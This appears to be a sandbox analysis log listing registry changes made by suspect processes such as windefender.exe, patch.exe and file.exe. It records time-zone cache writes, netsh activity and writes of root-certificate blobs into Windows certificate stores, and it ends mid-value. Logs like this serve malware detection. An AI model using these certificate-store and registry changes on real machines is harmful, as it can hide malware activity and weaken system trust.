\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" windefender.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 file.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48